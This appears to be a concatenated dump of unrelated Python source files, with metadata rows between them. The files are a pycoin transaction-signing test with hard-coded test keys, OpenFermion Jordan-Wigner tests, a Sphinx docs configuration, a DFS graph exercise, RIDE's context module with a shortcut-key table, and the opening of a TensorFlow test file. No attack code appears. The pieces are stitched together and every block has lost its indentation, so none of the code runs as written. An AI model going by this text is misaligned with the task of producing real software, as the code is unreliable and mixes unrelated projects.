spendable = {'script_hex': 'a914c4ed4de526461e3efbb79c8b688a6f9282c0464687', 'does_seem_spent': 0,
'block_index_spent': 0, 'coin_value': 10000, 'block_index_available': 0, 'tx_out_index': 0,
'tx_hash_hex': '0ca152ba6b88db87a7ef1afd24554102aca1ab86cf2c10ccbc374472145dc943'}
key_1 = key_from_text('Kz6pytJCigYHeMsGLmfHQPJhN5og2wpeSVrU43xWwgHLCAvpsprh')
key_2 = key_from_text('Kz7NHgX7MBySA3RSKj9GexUSN6NepEDoPNugSPr5absRDoKgn2dT')
for ordered_keys in [(key_1, key_2), (key_2, key_1)]:
txs_in = [TxIn(previous_hash=h2b('43c95d14724437bccc102ccf86aba1ac02415524fd1aefa787db886bba52a10c'),
previous_index=0)]
txs_out = [TxOut(10000, script_for_address('3KeGeLFmsbmbVdeMLrWp7WYKcA3tdsB4AR'))]
unspents = [Spendable.from_dict(spendable)]
tx = Tx(version=DEFAULT_VERSION, txs_in=txs_in, txs_out=txs_out, unspents=unspents)
for key in ordered_keys:
self.assertEqual(tx.bad_solution_count(), 1)
p2sh_lookup = build_p2sh_lookup(raw_scripts)
tx.sign(build_hash160_lookup([key.secret_exponent()], [secp256k1_generator]), p2sh_lookup=p2sh_lookup)
self.assertEqual(tx.bad_solution_count(), 0)
def test_sign_pay_to_script_multisig(self):
M, N = 3, 3
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
underlying_script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
address = address_for_p2s(underlying_script)
self.assertEqual(address, "39qEwuwyb2cAX38MFtrNzvq3KV9hSNov3q")
script = script_for_address(address)
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [address])
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[:N]), [secp256k1_generator])
p2sh_lookup = build_p2sh_lookup([underlying_script])
tx2.sign(hash160_lookup=hash160_lookup, p2sh_lookup=p2sh_lookup)
self.assertEqual(tx2.bad_solution_count(), 0)
def test_sign_bitcoind_partially_signed_2_of_2(self):
# Finish signing a 2 of 2 transaction, that already has one signature signed by bitcoind
# This tx can be found on testnet3 blockchain
# txid: 9618820d7037d2f32db798c92665231cd4599326f5bd99cb59d0b723be2a13a2
raw_script = ("522103e33b41f5ed67a77d4c4c54b3e946bd30d15b8f66e42cb29fde059c168851165521"
"02b92cb20a9fb1eb9656a74eeb7387636cf64cdf502ff50511830328c1b479986452ae")
p2sh_lookup = build_p2sh_lookup([h2b(raw_script)])
partially_signed_raw_tx = (
"010000000196238f11a5fd3ceef4efd5a186a7e6b9217d900418e72aca917cd6a6e634"
"e74100000000910047304402201b41b471d9dd93cf97eed7cfc39a5767a546f6bfbf3e"
"0c91ff9ad23ab9770f1f02205ce565666271d055be1f25a7e52e34cbf659f6c70770ff"
"59bd783a6fcd1be3dd0147522103e33b41f5ed67a77d4c4c54b3e946bd30d15b8f66e4"
"2cb29fde059c16885116552102b92cb20a9fb1eb9656a74eeb7387636cf64cdf502ff5"
"0511830328c1b479986452aeffffffff01a0bb0d00000000001976a9143b3beefd6f78"
"02fa8706983a76a51467bfa36f8b88ac00000000")
tx = Tx.from_hex(partially_signed_raw_tx)
tx_out = TxOut(1000000, h2b("a914a10dfa21ee8c33b028b92562f6fe04e60563d3c087"))
tx.set_unspents([tx_out])
key = key_from_text("cThRBRu2jAeshWL3sH3qbqdq9f4jDiDbd1SVz4qjTZD2xL1pdbsx")
hash160_lookup = build_hash160_lookup([key.secret_exponent()], [secp256k1_generator])
self.assertEqual(tx.bad_solution_count(), 1)
tx.sign(hash160_lookup=hash160_lookup, p2sh_lookup=p2sh_lookup)
self.assertEqual(tx.bad_solution_count(), 0)
self.assertEqual(tx.id(), "9618820d7037d2f32db798c92665231cd4599326f5bd99cb59d0b723be2a13a2")
if __name__ == "__main__":
unittest.main()
| 55.366667 | 120 | 0.725467 | [
"MIT"
] | Anappau/pycoin | tests/sign_test.py | 8,305 | Python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests _jordan_wigner.py."""
from __future__ import absolute_import
import numpy
import unittest
from openfermion.ops import (FermionOperator,
hermitian_conjugated,
InteractionOperator,
normal_ordered,
number_operator,
QubitOperator)
from openfermion.transforms import (get_interaction_operator,
reverse_jordan_wigner)
from openfermion.transforms._jordan_wigner import (
jordan_wigner, jordan_wigner_one_body, jordan_wigner_two_body,
jordan_wigner_interaction_op)
class JordanWignerTransformTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
def test_bad_input(self):
with self.assertRaises(TypeError):
jordan_wigner(3)
def test_transm_raise3(self):
raising = jordan_wigner(FermionOperator(((3, 1),)))
self.assertEqual(len(raising.terms), 2)
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, -0.5j)
self.assertEqual(raising.terms[correct_operators_x], 0.5)
self.assertEqual(raising.terms[correct_operators_y], -0.5j)
self.assertTrue(raising.isclose(qtermx + qtermy))
def test_transm_raise1(self):
raising = jordan_wigner(FermionOperator(((1, 1),)))
correct_operators_x = ((0, 'Z'), (1, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, -0.5j)
self.assertEqual(raising.terms[correct_operators_x], 0.5)
self.assertEqual(raising.terms[correct_operators_y], -0.5j)
self.assertTrue(raising.isclose(qtermx + qtermy))
def test_transm_lower3(self):
lowering = jordan_wigner(FermionOperator(((3, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower2(self):
lowering = jordan_wigner(FermionOperator(((2, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower1(self):
lowering = jordan_wigner(FermionOperator(((1, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower0(self):
lowering = jordan_wigner(FermionOperator(((0, 0),)))
correct_operators_x = ((0, 'X'),)
correct_operators_y = ((0, 'Y'),)
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_raise3lower0(self):
# recall that creation gets -1j on Y and annihilation gets +1j on Y.
term = jordan_wigner(FermionOperator(((3, 1), (0, 0))))
self.assertEqual(term.terms[((0, 'X'), (1, 'Z'), (2, 'Z'), (3, 'Y'))],
0.25 * 1 * -1j)
self.assertEqual(term.terms[((0, 'Y'), (1, 'Z'), (2, 'Z'), (3, 'Y'))],
0.25 * 1j * -1j)
self.assertEqual(term.terms[((0, 'Y'), (1, 'Z'), (2, 'Z'), (3, 'X'))],
0.25 * 1j * 1)
self.assertEqual(term.terms[((0, 'X'), (1, 'Z'), (2, 'Z'), (3, 'X'))],
0.25 * 1 * 1)
def test_transm_number(self):
n = number_operator(self.n_qubits, 3)
n_jw = jordan_wigner(n)
self.assertEqual(n_jw.terms[((3, 'Z'),)], -0.5)
self.assertEqual(n_jw.terms[()], 0.5)
self.assertEqual(len(n_jw.terms), 2)
def test_ccr_offsite_even_ca(self):
c2 = FermionOperator(((2, 1),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(c2 * a4).isclose(
normal_ordered(-a4 * c2)))
self.assertTrue(jordan_wigner(c2 * a4).isclose(
jordan_wigner(-a4 * c2)))
def test_ccr_offsite_odd_ca(self):
c1 = FermionOperator(((1, 1),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(c1 * a4).isclose(
normal_ordered(-a4 * c1)))
self.assertTrue(jordan_wigner(c1 * a4).isclose(
jordan_wigner(-a4 * c1)))
def test_ccr_offsite_even_cc(self):
c2 = FermionOperator(((2, 1),))
c4 = FermionOperator(((4, 1),))
self.assertTrue(normal_ordered(c2 * c4).isclose(
normal_ordered(-c4 * c2)))
self.assertTrue(jordan_wigner(c2 * c4).isclose(
jordan_wigner(-c4 * c2)))
def test_ccr_offsite_odd_cc(self):
c1 = FermionOperator(((1, 1),))
c4 = FermionOperator(((4, 1),))
self.assertTrue(normal_ordered(c1 * c4).isclose(
normal_ordered(-c4 * c1)))
self.assertTrue(jordan_wigner(c1 * c4).isclose(
jordan_wigner(-c4 * c1)))
def test_ccr_offsite_even_aa(self):
a2 = FermionOperator(((2, 0),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(a2 * a4).isclose(
normal_ordered(-a4 * a2)))
self.assertTrue(jordan_wigner(a2 * a4).isclose(
jordan_wigner(-a4 * a2)))
def test_ccr_offsite_odd_aa(self):
a1 = FermionOperator(((1, 0),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(a1 * a4).isclose(
normal_ordered(-a4 * a1)))
self.assertTrue(jordan_wigner(a1 * a4).isclose(
jordan_wigner(-a4 * a1)))
def test_ccr_onsite(self):
c1 = FermionOperator(((1, 1),))
a1 = hermitian_conjugated(c1)
self.assertTrue(normal_ordered(c1 * a1).isclose(
FermionOperator(()) - normal_ordered(a1 * c1)))
self.assertTrue(jordan_wigner(c1 * a1).isclose(
QubitOperator(()) - jordan_wigner(a1 * c1)))
def test_jordan_wigner_transm_op(self):
n = number_operator(self.n_qubits)
n_jw = jordan_wigner(n)
self.assertEqual(self.n_qubits + 1, len(n_jw.terms))
self.assertEqual(self.n_qubits / 2., n_jw.terms[()])
for qubit in range(self.n_qubits):
operators = ((qubit, 'Z'),)
self.assertEqual(n_jw.terms[operators], -0.5)
class InteractionOperatorsJWTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
self.constant = 0.
self.one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
self.two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
self.interaction_operator = InteractionOperator(self.constant,
self.one_body,
self.two_body)
def test_jordan_wigner_one_body(self):
# Make sure it agrees with jordan_wigner(FermionTerm).
for p in range(self.n_qubits):
for q in range(self.n_qubits):
# Get test qubit operator.
test_operator = jordan_wigner_one_body(p, q)
# Get correct qubit operator.
fermion_term = FermionOperator(((p, 1), (q, 0)))
correct_op = jordan_wigner(fermion_term)
hermitian_conjugate = hermitian_conjugated(fermion_term)
if not fermion_term.isclose(hermitian_conjugate):
correct_op += jordan_wigner(hermitian_conjugate)
self.assertTrue(test_operator.isclose(correct_op))
def test_jordan_wigner_two_body(self):
# Make sure it agrees with jordan_wigner(FermionTerm).
for p in range(self.n_qubits):
for q in range(self.n_qubits):
for r in range(self.n_qubits):
for s in range(self.n_qubits):
# Get test qubit operator.
test_operator = jordan_wigner_two_body(p, q, r, s)
# Get correct qubit operator.
fermion_term = FermionOperator(((p, 1), (q, 1),
(r, 0), (s, 0)))
correct_op = jordan_wigner(fermion_term)
hermitian_conjugate = hermitian_conjugated(
fermion_term)
if not fermion_term.isclose(hermitian_conjugate):
if p == r and q == s:
pass
else:
correct_op += jordan_wigner(
hermitian_conjugate)
self.assertTrue(test_operator.isclose(correct_op),
str(test_operator - correct_op))
def test_jordan_wigner_twobody_interaction_op_allunique(self):
test_op = FermionOperator('1^ 2^ 3 4')
test_op += hermitian_conjugated(test_op)
retransformed_test_op = reverse_jordan_wigner(jordan_wigner(
get_interaction_operator(test_op)))
self.assertTrue(normal_ordered(retransformed_test_op).isclose(
normal_ordered(test_op)))
def test_jordan_wigner_twobody_interaction_op_reversal_symmetric(self):
test_op = FermionOperator('1^ 2^ 2 1')
test_op += hermitian_conjugated(test_op)
self.assertTrue(jordan_wigner(test_op).isclose(
jordan_wigner(get_interaction_operator(test_op))))
def test_jordan_wigner_interaction_op_too_few_n_qubits(self):
with self.assertRaises(ValueError):
jordan_wigner_interaction_op(self.interaction_operator,
self.n_qubits - 2)
def test_jordan_wigner_interaction_op_with_zero_term(self):
test_op = FermionOperator('1^ 2^ 3 4')
test_op += hermitian_conjugated(test_op)
interaction_op = get_interaction_operator(test_op)
interaction_op.constant = 0.0
retransformed_test_op = reverse_jordan_wigner(jordan_wigner(
interaction_op))
class GetInteractionOperatorTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
self.constant = 0.
self.one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
self.two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
def test_get_interaction_operator_identity(self):
interaction_operator = InteractionOperator(-2j, self.one_body,
self.two_body)
qubit_operator = jordan_wigner(interaction_operator)
self.assertTrue(qubit_operator.isclose(-2j * QubitOperator(())))
self.assertEqual(interaction_operator,
get_interaction_operator(reverse_jordan_wigner(
qubit_operator), self.n_qubits))
def test_get_interaction_operator_one_body(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 2'), self.n_qubits)
one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
one_body[2, 2] = 1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, one_body, self.two_body))
def test_get_interaction_operator_one_body_twoterm(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 3', -2j) + FermionOperator('3^ 2', 3j),
self.n_qubits)
one_body = numpy.zeros((self.n_qubits, self.n_qubits), complex)
one_body[2, 3] = -2j
one_body[3, 2] = 3j
self.assertEqual(interaction_operator,
InteractionOperator(0.0, one_body, self.two_body))
def test_get_interaction_operator_two_body(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 2 3^ 4'), self.n_qubits)
two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
two_body[3, 2, 4, 2] = -1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, self.one_body, two_body))
def test_get_interaction_operator_two_body_distinct(self):
interaction_operator = get_interaction_operator(
FermionOperator('0^ 1^ 2 3'), self.n_qubits)
two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
two_body[1, 0, 3, 2] = 1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, self.one_body, two_body))
| 42.675439 | 78 | 0.599383 | [
"Apache-2.0"
] | yudongcao/OpenFermion | src/openfermion/transforms/_jordan_wigner_test.py | 14,595 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# oz_cli documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import oz_cli
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Oz the Powerful'
copyright = u"2018, Shane William Leonard"
author = u"Shane William Leonard"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = oz_cli.__version__
# The full version, including alpha/beta/rc tags.
release = oz_cli.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'oz_clidoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'oz_cli.tex',
u'Oz the Powerful Documentation',
u'Shane William Leonard', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'oz_cli',
u'Oz the Powerful Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'oz_cli',
u'Oz the Powerful Documentation',
author,
'oz_cli',
'One line description of project.',
'Miscellaneous'),
]
| 29.628049 | 77 | 0.684091 | [
"MIT"
] | shaneleonard/oz | docs/conf.py | 4,859 | Python |
def dfs(graph, start, end):
stack = [start]
visited = []
while stack:
u = stack.pop() # stack에서 아이템을 빼낸다.
visited.append(u)
if end in visited:
return 1
for v in graph[u]:
if v not in visited and v not in stack:
stack.append(v)
return 0
t = int(input())
for i in range(t):
graph = {}
node, seg = map(int, input().split())
for _ in range(seg):
a, b = map(int, input().split())
graph[a] = graph.get(a, []) + [b]
if b not in graph:
graph[b] = []
# graph[b] = graph.get(b, []) + [a]
start, end = map(int, input().split())
print(f"#{i + 1} {dfs(graph, start, end)}")
| 26.518519 | 51 | 0.480447 | [
"MIT"
] | mrbartrns/swacademy_structure | swea/stack/dfs_p1.py | 734 | Python |
# -*- coding: utf-8 -*-
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import wx
from . import logger
from ..robotapi import ROBOT_LOGGER
from ..version import VERSION
APP = None
LOG = logger.Logger()
ROBOT_LOGGER.unregister_console_logger()
ROBOT_LOGGER.register_logger(LOG)
IS_WINDOWS = os.sep == '\\'
IS_MAC = sys.platform == 'darwin'
IS_LINUX = sys.platform == 'linux'
WX_VERSION = wx.VERSION_STRING
if IS_WINDOWS:
SETTINGS_DIRECTORY = os.path.join(
os.environ['APPDATA'], 'RobotFramework', 'ride')
else:
SETTINGS_DIRECTORY = os.path.join(
os.path.expanduser('~/.robotframework'), 'ride')
LIBRARY_XML_DIRECTORY = os.path.join(SETTINGS_DIRECTORY, 'library_xmls')
if not os.path.isdir(LIBRARY_XML_DIRECTORY):
os.makedirs(LIBRARY_XML_DIRECTORY)
SETTING_EDITOR_WIDTH = 450
SETTING_LABEL_WIDTH = 150
SETTING_ROW_HEIGHT = 25
# TODO: Make this colour configurable
POPUP_BACKGROUND = (240, 242, 80) # (255, 255, 187)
POPUP_FOREGROUND = (40, 40, 0) # (255, 255, 187)
pyversion = '.'.join(str(v) for v in sys.version_info[:3])
SYSTEM_INFO = "Started RIDE %s using python version %s with wx version %s in %s." % \
(VERSION, pyversion, WX_VERSION, sys.platform)
ABOUT_RIDE = '''<h3>RIDE -- Robot Framework Test Data Editor</h3>
<p>RIDE %s running on Python %s.</p>
<p>RIDE is a test data editor for <a href="http://robotframework.org">Robot Framework</a>.
For more information, see project pages at
<a href="https://github.com/robotframework/RIDE">https://github.com/robotframework/RIDE</a>.</p>
<p>Some of the icons are from <a href="http://www.famfamfam.com/lab/icons/silk/">Silk Icons</a>.</p>
<p><br/><br/><a href="https://github.com/HelioGuilherme66">Hélio Guilherme</a> the maintainer of the project thanks the
original authors and all users and collaborators.<br/>
A very special thanks to <b><a href="https://github.com/Nyral">Nyral</a></b> and <b><a href="https://github.com/jnhyperi
on">Johnny.H</a></b> the most commited in helping RIDE development and maintenance.</p>
''' % (VERSION, pyversion)
def ctrl_or_cmd():
if IS_MAC:
return wx.ACCEL_CMD
return wx.ACCEL_CTRL
def bind_keys_to_evt_menu(target, actions):
accelrators = []
for accel, keycode, handler in actions:
_id = wx.NewIdRef()
target.Bind(wx.EVT_MENU, handler, id=_id)
accelrators.append((accel, keycode, _id))
target.SetAcceleratorTable(wx.AcceleratorTable(accelrators))
SHORTCUT_KEYS = '''\
<h2>Shortcut keys in RIDE</h2>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>CtrlCmd-S</td>
<td>Save</td>
</tr>
<tr>
<td>CtrlCmd-Shift-S</td>
<td>Save all</td>
</tr>
<tr>
<td>CtrlCmd-O</td>
<td>Open</td>
</tr>
<tr>
<td>CtrlCmd-Shift-O</td>
<td>Open directory</td>
</tr>
<tr>
<td>CtrlCmd-R</td>
<td>Open resource</td>
</tr>
<tr>
<td>Shift-CtrlCmd-R</td>
<td>Refresh directory</td>
</tr>
<tr>
<td>CtrlCmd-N</td>
<td>New project</td>
</tr>
<tr>
<td>Shift-CtrlCmd-N</td>
<td>New resource</td>
</tr>
<tr>
<td>CtrlCmd-Q</td>
<td>Quit RIDE</td>
</tr>
<tr>
<td>Alt-X</td>
<td>Go Forward</td>
</tr>
<tr>
<td>Alt-Z</td>
<td>Go Back</td>
</tr>
<tr>
<td>F6</td>
<td>Open preview</td>
</tr>
<tr>
<td>F5</td>
<td>Open search keywords dialog</td>
</tr>
<tr>
<td>F3</td>
<td>Open search tests dialog</td>
</tr>
<tr>
<td>F8</td>
<td>Run test suite</td>
</tr>
<tr>
<td>CtrlCmd-F8</td>
<td>Stop running test suite</td>
</tr>
</table>
<h3>Grid</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Ctrl-Space or Alt-Space</td>
<td>Suggestions and auto completion</td>
</tr>
<tr>
<td>CtrlCmd</td>
<td>Help for cell content</td>
</tr>
<tr>
<td>CtrlCmd-Shift-J</td>
<td>Pop-up JSON Editor</td>
</tr>
<tr>
<td>CtrlCmd-I</td>
<td>Insert row(s)</td>
</tr>
<tr>
<td>CtrlCmd-D</td>
<td>Remove row(s)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-I</td>
<td>Insert cell(s)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-D</td>
<td>Remove cell(s)</td>
</tr>
<tr>
<td>CtrlCmd-Z</td>
<td>Undo</td>
</tr>
<tr>
<td>CtrlCmd-Y</td>
<td>Redo</td>
</tr>
<tr>
<td>CtrlCmd-1</td>
<td>Make scalar variable body</td>
</tr>
<tr>
<td>CtrlCmd-2</td>
<td>Make list variable body</td>
</tr>
<tr>
<td>CtrlCmd-3</td>
<td>Comment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-4</td>
<td>Uncomment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-5</td>
<td>Make dictionary variable body</td>
</tr>
<tr>
<td>Alt-Up</td>
<td>Move row(s) up</td>
</tr>
<tr>
<td>Alt-Down</td>
<td>Move row(s) down</td>
</tr>
<tr>
<td>Alt-Enter</td>
<td>Move cursor down</td>
</tr>
<tr>
<td>CtrlCmd-A</td>
<td>Select all</td>
</tr>
<tr>
<td>CtrlCmd-X</td>
<td>Cut (does not remove cells or rows)</td>
</tr>
<tr>
<td>CtrlCmd-C</td>
<td>Copy</td>
</tr>
<tr>
<td>CtrlCmd-V</td>
<td>Paste (does not move cells or rows)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-V</td>
<td>Insert (adds empty rows and pastes data)</td>
</tr>
<tr>
<td>Delete</td>
<td>Remove cell content</td>
</tr>
</table>
<h3>Tree view</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Shift-CtrlCmd-T</td>
<td>Add new test case</td>
</tr>
<tr>
<td>Shift-CtrlCmd-K</td>
<td>Add new keyword</td>
</tr>
<tr>
<td>Shift-CtrlCmd-V</td>
<td>Add new scalar variable</td>
</tr>
<tr>
<td>Shift-CtrlCmd-L</td>
<td>Add new list variable</td>
</tr>
<tr>
<td>F2</td>
<td>Rename</td>
</tr>
<tr>
<td>Shift-CtrlCmd-C</td>
<td>Clone/Copy selected keyword/test case</td>
</tr>
<tr>
<td>CtrlCmd-Up</td>
<td>Move item up</td>
</tr>
<tr>
<td>CtrlCmd-Down</td>
<td>Move item down</td>
</tr>
</table>
<h3>Text editor</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Ctrl-Space or Alt-Space</td>
<td>Suggestions and auto completion</td>
</tr>
<tr>
<td>CtrlCmd-T</td>
<td>Swap current row up</td>
</tr>
<tr>
<td>Tab</td>
<td>Inserts the defined number of spaces</td>
</tr>
<tr>
<td>Shift-Tab</td>
<td>Moves cursor to the left the defined number of spaces</td>
</tr>
<tr>
<td>Ctrl-MouseWheel Roll</td>
<td>Increases or Decreases font size (Zoom +/-)</td>
</tr>
<tr>
<td>CtrlCmd-F</td>
<td>Find in text</td>
</tr>
<tr>
<td>CtrlCmd-G</td>
<td>Find next search result</td>
</tr>
<tr>
<td>Shift-CtrlCmd-G</td>
<td>Find previous search result</td>
</tr>
<tr>
<td>CtrlCmd-1</td>
<td>Make scalar variable body</td>
</tr>
<tr>
<td>CtrlCmd-2</td>
<td>Make list variable body</td>
</tr>
<tr>
<td>CtrlCmd-3</td>
<td>Comment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-4</td>
<td>Uncomment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-5</td>
<td>Make dictionary variable body</td>
</tr>
<tr>
<td>Enter</td>
<td>When focus is in the search field, find next search result</td>
</tr>
<tr>
<td>Shift-Enter</td>
<td>When focus is in the search field, find previous search result</td>
</tr>
</table>
<h3>Run tab</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>CtrlCmd-C</td>
<td>Copy from text output when text selected</td>
</tr>
<tr>
<td>CtrlCmd-L</td>
<td>Open HTML log</td>
</tr>
<tr>
<td>CtrlCmd-R</td>
<td>Show HTML report</td>
</tr>
<tr>
<td>Ctrl-MouseWheel Roll</td>
<td>Increases or Decreases font size (Zoom +/-)</td>
</tr>
</table>
'''
| 24.264103 | 120 | 0.537356 | [
"ECL-2.0",
"Apache-2.0"
] | HelioGuilherme66/RIDE | src/robotide/context/__init__.py | 9,464 | Python |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for preprocessing."""
from __future__ import absolute_import
